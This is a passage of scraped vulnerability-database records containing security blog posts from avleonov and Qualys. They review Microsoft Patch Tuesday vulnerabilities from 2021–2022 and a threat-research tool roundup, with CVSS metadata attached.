Vulnerabilities with 18 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/07/12/july-2022-patch-tuesday\n ZDI|The July 2022 Security Update Review|https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"July\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n Creating Patch Tuesday profile...\n MS PT Year: 2022\n MS PT Month: July\n MS PT Date: 2022-07-12\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-06-15\n Ext MS PT Date to: 2022-07-11\n Ext MS PT CVEs found: 15\n ALL MS PT CVEs: 99\n ...\n\n * Urgent: 0\n * Critical: 1\n * High: 19\n * Medium: 78\n * Low: 1\n\nInterestingly, in this Patch Tuesday, more than half of all vulnerabilities are EoP.\n\n## CSRSS EoP\n\nWhat can I say, prioritization in [Vulristics](<https://github.com/leonov-av/vulristics>) works correctly. At the top of the July Patch Tuesday list is one critical and actively exploited **Elevation of Privilege** in Windows CSRSS (CVE-2022-22047). This vulnerability has been widely reported in the media.\n\nClient Server Runtime Subsystem, or csrss.exe, is a component of the Windows NT family of operating systems that provides the user mode side of the Win32 subsystem and is included in Windows NT 3.1 and later. Because most of the Win32 subsystem operations have been moved to kernel mode drivers in Windows NT 4 and later, CSRSS is mainly responsible for Win32 console handling and GUI shutdown.\n\nCSRSS runs as a user-mode system service. When a user-mode process calls a function involving console windows, process/thread creation, or side-by-side support, instead of issuing a system call, the Win32 libraries (kernel32.dll, user32.dll, gdi32.dll) send an inter-process call to the CSRSS process which does most of the actual work without compromising the kernel.\n\nThis Elevation of Privilege vulnerability in CSRSS allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default.\n\nMicrosoft says this vulnerability has been exploited in the wild, though no further details have been shared. There is no public exploit yet. Two similar vulnerabilities in CSRSS (CVE-2022-22049 and CVE-2022-22026) were also fixed, likely as a result of Microsoft\u2019s investigation into the in-the-wild exploitation of CVE-2022-22047.\n\n## RPC RCE\n\n**Remote Code Execution** in Remote Procedure Call Runtime (CVE-2022-22038). Here Microsoft has a POC exploit. This July Patch Tuesday bug could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the presumption is that the code execution would occur at elevated privileges. Combine these attributes and you end up with a potentially wormable bug. Microsoft states the attack complexity is high. Additional actions by an attacker are required in order to prepare a target for successful exploitation and an attacker would need to make \u201crepeated exploitation attempts\u201d to take advantage of this bug, but unless you are actively blocking RPC activity, you may not see these attempts.\n\n## Microsoft Edge Memory Corruption\n\nBetween June and July Patch Tuesday, **Memory Corruption** in Microsoft Edge (CVE-2022-2294) was released. Heap buffer overflow in WebRTC, to be precise. WebRTC (Web Real-Time Communication) is a free and open-source project providing web browsers and mobile applications with real-time communication (RTC) via application programming interfaces (APIs). It allows audio and video communication to work inside web pages by allowing direct peer-to-peer communication, eliminating the need to install plugins or download native apps. So, the vulnerability is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. Google is aware that an exploit for this vulnerability exists in the wild. If you\u2019re using Microsoft Edge (Chromium-based), make sure it gets updated as soon as possible.\n\n## Azure Site Recovery RCEs and EOPs\n\nThere are also a lot of vulnerabilities in Azure Site Recovery in July Patch Tuesday. Both EoPs and RCEs, and quite a few with non-public exploits of the POC maturity level. According to the description &quot;Site Recovery is a native disaster recovery as a service (DRaaS)&quot;, it would seem that this should be patched by Microsoft themselves. But in fact, there is a Microsoft Azure Site Recovery suite installed on the hosts, and at least some of the vulnerabilities were found in it. \n\nLet&#x27;s see, for example, **Elevation of Privilege** in Azure Site Recovery (CVE-2022-33675). The vulnerability was discovered and [reported to Microsoft by Tenable researcher Jimi Sebree](<https://www.tenable.com/security/research/tra-2022-26>). The Microsoft Azure Site Recovery suite contains a DLL hijacking flaw that allows for privilege escalation from any low privileged user to SYSTEM. \n\nIncorrect permissions on the service\u2019s executable directory (E:\\Program Files (x86)\\Microsoft Azure Site Recovery\\home\\svsystems\\transport\\\\) allow new files to be created by any user. The service launched from this directory runs automatically and with SYSTEM privileges and attempts to load several DLLs from this directory. This allows for a DLL hijacking/planting attack via several libraries that are attempted to be loaded from this location when the service is launched. Existing deployments should ensure that the Microsoft-supplied patches have been appropriately applied.\n\nThe full Vulristics report is available here: [ms_patch_tuesday_july2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-23T08:34:29", "type": "avleonov", "title": "Microsoft Patch Tuesday July 2022: propaganda report, CSRSS EoP, RPC RCE, Edge, Azure Site Recovery", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22038", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-33675"], "modified": "2022-07-23T08:34:29", "id": "AVLEONOV:B87691B304EF70215B926F66B871260A", "href": "https://avleonov.com/2022/07/23/microsoft-patch-tuesday-july-2022-propaganda-report-csrss-eop-rpc-rce-edge-azure-site-recovery/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:07", "description": "Hello everyone! Let&#x27;s now talk about Microsoft Patch Tuesday vulnerabilities for the second quarter of 2021. April, May and June. Not the most exciting topic, I agree. I am surprised that someone is reading or watching this. For me personally, this is a kind of tradition. Plus this is an opportunity to try Vulristics in action and find possible problems. It is also interesting to see what VM vendors considered critical back then and what actually became critical. I will try to keep this video short.\n\nFirst of all, let&#x27;s take a look at the vulnerabilities from the April Patch Tuesday. 108 vulnerabilities, 55 of them are RCEs. Half of these RCEs (27) are weird RPC vulnerabilities. &quot;Researcher who reported these bugs certainly found quite the attack surface&quot;. The most critical vulnerability is RCE in Exchange (CVE-2021-28480). This is not ProxyLogon, this is another vulnerability. ProxyLogon was in March. And this vulnerability is simply related to ProxyLogon, so it is believed that it is exploited in the wild as well. In the second place this Win32k Elevation of Privilege (CVE-2021-28310). It is clearly mentioned in several sources as being used in real attacks. &quot;Bugs of this nature are typically combined with other bugs, such as a browser bug or PDF exploit, to take over a system&quot;. And the only vulnerability with a public exploit is the Azure DevOps Server Spoofing (CVE-2021-28459). Previously known as Team Foundation Server (\u200bTFS), Azure DevOps Server is a set of collaborative software development tools. It is hosted on-premises. Therefore, this vulnerability can be useful for attackers.\n\nLet&#x27;s take a look at May. A very small Patch Tuesday. There are only 55 vulnerabilities. Vendors mainly wrote about HTTP Protocol Stack Remote Code Execution Vulnerability. But no catastrophe happened. &quot;tenable: On May 16, security researcher 0vercl0k published PoC code to github for CVE-2021-31166. Based on our analysis, this exploit could only result in a denial of service (DoS) condition&quot;. VM vendors also wrote a lot about Hyper-V Remote Code Execution Vulnerability. But there was no real exploitation there either. But a real exploit appeared for Remote Code Execution in Microsoft SharePoint (CVE-2021-31181). And exploitation in the wild was mentioned for Windows Container Manager Service (CVE-2021-31167), which no VM vendor mentioned at all. But the exploitation was &quot;Personally observed in an environment&quot;, so this may not be accurate. Also take a look at Memory Corruption in Microsoft Scripting Engine (CVE-2021-26419) with a public exploit and Information Disclosure in Windows Wireless Networking (CVE-2020-24587) with a sign of exploitation in the wild (but this also may not be accurate).\n\nAnd finally June. There are even fewer vulnerabilities, only 49. But there are a lot of them with a sign of exploitation in the wild. And this information is directly from Microsoft. Windows MSHTML Platform Remote Code Execution (CVE-2021-33742). Elevations of Privilege in Windows NTFS (CVE-2021-31956), Microsoft Enhanced Cryptographic Provider (CVE-2021-31199, CVE-2021-31201), Microsoft DWM Core Library (CVE-2021-33739). Windows Kernel Information Disclosure (CVE-2021-31955). Much more than usual. VM vendors have written the most about EoP in Windows NTFS (CVE-2021-31956). Do you know what vulnerability they didn&#x27;t highlight at all? Elevations of Privilege and later Remote Code Execution in Windows Print Spooler (CVE-2021-1675). The one that started the PrintNightmare story. Very ironic. Also pay attention to Spoofing in Microsoft SharePoint (CVE-2021-31950) for which there is a public Server-Side Request Forgery exploit. VM vendors also did not write anything about this vulnerability in their reviews.\n\nFull Vulristics reports:\n\n * [ms_patch_tuesday_april2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_may2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_may2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_june2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2021_report_avleonov_comments.html>)\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-10T00:14:59", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24587", "CVE-2021-1675", "CVE-2021-26419", "CVE-2021-28310", "CVE-2021-28459", "CVE-2021-28480", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31181", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31950", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-07-10T00:14:59", "id": "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "href": "http://feedproxy.google.com/~r/avleonov/~3/zKo35MmSBcA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! Yet another news episode.\n\n## Microsoft&#x27;s August Patch Tuesday\n\nLet&#x27;s start with Microsoft&#x27;s August Patch Tuesday. I think the most interesting thing is that it contains a fix for the PetitPotam vulnerability. I talked about this vulnerability two weeks ago. At the time, Microsoft had no plans to release a patch because PetitPotam was a &quot;classic NTLM Relay Attack&quot;. But the patch was actually released as part of August Patch Tuesday.\n\nA [quote from Rapid7](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>): _&quot;Tracked as CVE-2021-36942, the August 2021 Patch Tuesday security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through the LSARPC interface&quot;_. \n\nThere are no formal signs that this vulnerability is critical other than comments from the vendors. My Vulristics tool has flagged this &quot;Windows LSA Spoofing&quot; as a Medium level Vulnerability. But this fix seems to be the most important thing in this Patch Tuesday. So install this patch first.\n\nSpeaking of other vulnerabilities. There was nothing critical. No vulnerabilities with public exploits. Only one vulnerability that has been exploited in the wild, CVE-2021-36948 \u2013 Windows Update Medic Service Elevation of Privilege. But this is EoP and there are no public exploits yet, so I think you can patch it as planned without hurry.\n\nSeveral potentially dangerous RCEs:\n\n * Windows Print Spooler (CVE-2021-36936, CVE-2021-36947). They look similar to PrintNightmare, but there are no details yet.\n * Windows TCP/IP (CVE-2021-26424) and Remote Desktop Client (CVE-2021-34535). Such vulnerabilities rarely get public exploits.\n * NFS ONCRPC XDR Driver (CVE-2021-26432). Nothing is clear at all.\n\nIn general, it looks like a ptetty calm Patch Tuesday. If you&#x27;re interested, a link to the Vulristics report: In general, it looks like a ptetty calm Patch Tuesday. If you&#x27;re interested, a link to the Vulristics report: [ms_patch_tuesday_august2021](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_august2021_report_avleonov_comments.html>)\n\n## Phishers started using reCAPTCHA\n\nFunny news that I really liked. [Phishers started using reCAPTCHA](<https://threatpost.com/cyberattackers-captchas-phishing-malware/168684/>) to bypass the automatic detection of phishing sites. The script only sees the safe page with a CAPTCHA and can&#x27;t solve it. But a real person just solves it without thinking, because people used to seeing and solving such CAPTCHAs, and see the complete phishing site. It&#x27;s very simple and ingenious! \n\n## Scan one IP and go to the prison\n\nAnd the last will be [a local news from Russia](<https://www.rbc.ru/technology_and_media/17/08/2021/611a95059a7947e9bf954a8f>). But the case is interesting. One guy worked in the tech support of some internet provider. And he decided to scan the network of this provider, detect misconfigured routers of the clients and inform them about the found vulnerabilities. His boss knew about it. Unfortunatelly, these clients included some government scientific research-to-production facility with a mail server available on the scanned IP. This facility is a \u201ccritical infrastructure\u201d object and the actions of a support technician are classified as an attack on critical infrastructure. He can spend up to 7 years in prison. Why he personally and not his employer? That guy worked remotelly from home and scanned from his personal IP address.\n\nA pretty crazy story, but it shows the cirumstances of &quot;penetration testing&quot; or &quot;bughunting&quot; without getting all necessery formal permissions. It also shows how, in theory, a person could be easily framed as an attacker if that person&#x27;s personal device is compromised. Also, I don&#x27;t think port scanning or banner grabbing is actually an attack, IMHO this is normal network activity. And I don&#x27;t think that checking the default passwords is always an attack, but it is a topic for discussion. In fact it doesn&#x27;t matter what I or we think, it&#x27;s only law enforcement practice that matters, and that practice can be pretty harsh. So keep that in mind and don&#x27;t scan the unknown hosts that don&#x27;t belong to you unless you want sudden problems.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T21:38:46", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday August 2021, Phishers Started Using reCAPTCHA, Scan 1 IP and Go to Jail", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-19T21:38:46", "id": "AVLEONOV:3530747E605445686B7211B2B0853579", "href": "https://avleonov.com/2021/08/20/security-news-microsoft-patch-tuesday-august-2021-phishers-started-using-recaptcha-scan-1-ip-and-go-to-jail/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-09-13T00:03:22", "description": "Welcome to the first edition of the Qualys Research Team\u2019s \u201cThreat Research Thursday\u201d where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. We will endeavor to issue these update reports regularly, as often as every other week, or as our threat intelligence output warrants. \n\n\n\n## Threat Intelligence from the Qualys Blog\n\nHere is a roundup of the most interesting blogs from the Qualys Research Team from the past couple of weeks: \n\n * New Qualys Research Report: [Evolution of Quasar RAT](<https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat>) \u2013 This free downloadable report gives a sneak peek of the detailed webinar topic that Qualys Threat Research team\u2019s Linux EDR expert Viren Chaudari will be presenting on our upcoming [Threat Thursdays webinar](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>). \n * Here\u2019s a [Simple Script to Detect the Stealthy Nation-State BPFDoor](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor>) \u2013 In this blog we explain how a simple script can detect a BPFDoor. \n * Introducing [Qualys CyberSecurity Asset Management 2.0](<https://www.qualys.com/apps/cybersecurity-asset-management/>) with natively integrated [External Attack Surface Management](<https://blog.qualys.com/qualys-insights/2022/07/28/attack-surface-management-a-critical-pillar-of-cybersecurity-asset-management>) \u2013 This is big news! We offer one of only a few solutions on the market that empower cybersecurity teams to manage internal and external assets at the same time! For our existing customers, [Qualys CSAM API Best Practices](<https://blog.qualys.com/product-tech/2022/08/05/qualys-api-best-practices-cybersecurity-asset-management-api>) should be a good starting point for playing with our extensive list of APIs. \n * [August 2022 Patch Tuesday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/09/august-2022-patch-tuesday>) \u2013 Microsoft and the second Tuesday of the month are inseparable (except that one time in 2017 just before the Equation Group leak!) This is our regular monthly coverage of the vulnerabilities that Microsoft and Adobe fixed this month. \n\n## New Threat Hunting Tools &amp; Techniques\n\n**Sysmon v14.0, AccessEnum v1.34, and Coreinfo v3.53**: This is a major update to Sysmon that adds a new `event ID 27 - FileBlockExecutable` that prevents processes from creating executable files in specified locations. What this means is if you want to block certain files from executing in a certain directory, you can do so. [Get these tools &amp; updates](<https://docs.microsoft.com/en-us/sysinternals/downloads/>). \n\n**Bomber: **All of us know how important software bills of materials (SBOMs) are, and the vulnerabilities that affect them even more so. This open-source repository tool that we\u2019ve evaluated will help you scan JSON formatted SBOM files to point out any vulnerabilities they may have. [Check out Bomber](<https://github.com/devops-kung-fu/bomber>). \n\n**Alan C2 Framework:** Until recently, this command &amp; control (C2) framework \u2013 even though it was hosted on GitHub \u2013 was closed source. You could download it and test it for free, but not inspect its source code unless you decompiled it. Now the source code has been made available. For example, you can now look at the [certificate information](<https://github.com/enkomio/AlanFramework/blob/8134494037435c5e6478409447efe41f563e0688/src/client/mbedtls/tests/data_files/dir-maxpath/c20.pem>) and add it to your detection pipeline if you have not already done so. [Access the Alan C2 Framework source code](<https://github.com/enkomio/AlanFramework>). \n\n**FISSURE**: This interesting Radio Frequency (RF) framework was released as open source at the recently concluded DEFCONference. With this reverse engineering RF framework, you can detect, classify signals, execute attacks, discover protocols, and analyze vulnerabilities. A lot can be done with this tool! [Check out FISSURE](<https://github.com/ainfosec/FISSURE>). \n\n**Sub7 Legacy**: The source code to your favorite trojan from the not-so-recent past is now available. Well, not really. This is a complete remake of the trojan from the early 2000\u2019s. The look &amp; feel is still the same \u2013 minus the malicious features, but it does make one nostalgic. Here\u2019s hoping that threat actor groups don\u2019t use this Delphi source code for new and nefarious use cases! [Check out the new Sub7 Legacy](<https://github.com/DarkCoderSc/SubSeven>). \n\n**Hashview**: What do you do when you dump a hash via Mimikatz and want to crack it? In a team engagement, a tool like Hashview can help. It allows you to automate hashcat, retroactively crack hashes, and get notifications on a particular event. [Check out the Hashview source code](<https://github.com/hashview/hashview>). \n\n**Center for Internet Security: **CIS published their August update for the [End-of-Support Software Report List](<https://www.cisecurity.org/insights/blog/end-of-support-software-report-list>). Use it coupled with Qualys CSAM to stay updated on software that\u2019s no longer vendor supported. \n\n## New Vulnerabilities \n\n[**CVE-2022-34301**](<https://nvd.nist.gov/vuln/detail/CVE-2022-34301>)/[**CVE-2022-34302**](<https://nvd.nist.gov/vuln/detail/CVE-2022-34302>)/[**CVE-2022-34303**](<https://nvd.nist.gov/vuln/detail/CVE-2022-34303>) \u2013 Not much was known about these bootloader vulnerabilities when they were first disclosed as part of Microsoft Patch Tuesday. New research about these vulnerabilities was [presented at DEFCON](<https://eclypsium.com/2022/08/11/vulnerable-bootloaders-2022/>) pointing towards weaknesses in third-party code signed by Microsoft. Special care must be given to fixing these vulnerabilities, as manual intervention is required for complete remediation. \n\n[**CVE-2022-30209**](<https://nvd.nist.gov/vuln/detail/CVE-2022-30209>) \u2013 Fresh off of its disclosure at Black Hat USA 2022, this _IIS authentication bypass vulnerability_ discovered by Devcore, is [introduced](<https://twitter.com/orange_8361/status/1557504677050478594?s=20&t=KnnUPgzWitsV-dCEdSeCjA>) because of a logic error as a result of improper copy/pasting of variable names. Qualys VMDR customers can find unpatched devices in their networks by looking for QID 91922 in their results. \n\n[**CVE-2022-22047**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>) - This Windows client/server runtime subsystem (CSRSS) _elevation of privilege vulnerability_ affects almost all Windows versions, including v7, 8.1, 10, 11, and Windows Server 2008, 2012, 2016, 2019, and 2022! QIDs 91922 and 91927 should be of interest to current Qualys VMDR customers. \n\n[**CVE-2022-26138**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26138>) \u2013 The Confluence Questions app, when installed will create a `disabledsystemuser `user with a known and now _publicized hardcoded password_. Post exploitation, bad actors can read the pages accessible by the confluence-users group. \n\n[**CVE-2022-26501**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26501>) \u2013 Proof-of-concept code for this _unauthenticated remote code execution_ vulnerability affecting Veeam Distribution Service (VDS) has been available for more than four months now. When last checked on Shodan, there were more than 18,000 publicly facing devices that host Veeam Backup Services. \n\n## Introducing the Monthly Threat Thursdays Webinar \n\nPlease join us for the first [Threat Thursdays monthly webinar](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) where the Qualys Threat Research Team will present the latest threat intelligence\u2026 each and every month! \n\n[REGISTER NOW](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-01T21:00:00", "type": "qualysblog", "title": "Introducing Qualys Threat Research Thursdays", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047", "CVE-2022-26138", "CVE-2022-26501", "CVE-2022-30209", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303"], "modified": "2022-09-01T21:00:00", "id": "QUALYSBLOG:AE4AA7402829D66599C8A25E83DD0FD2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-15T23:58:32", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month&#x27;s Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates as well.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. (Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim&#x27;s system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. If you do not have either of these versions of RDP installed on Windows 7 SP1 or Window Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge 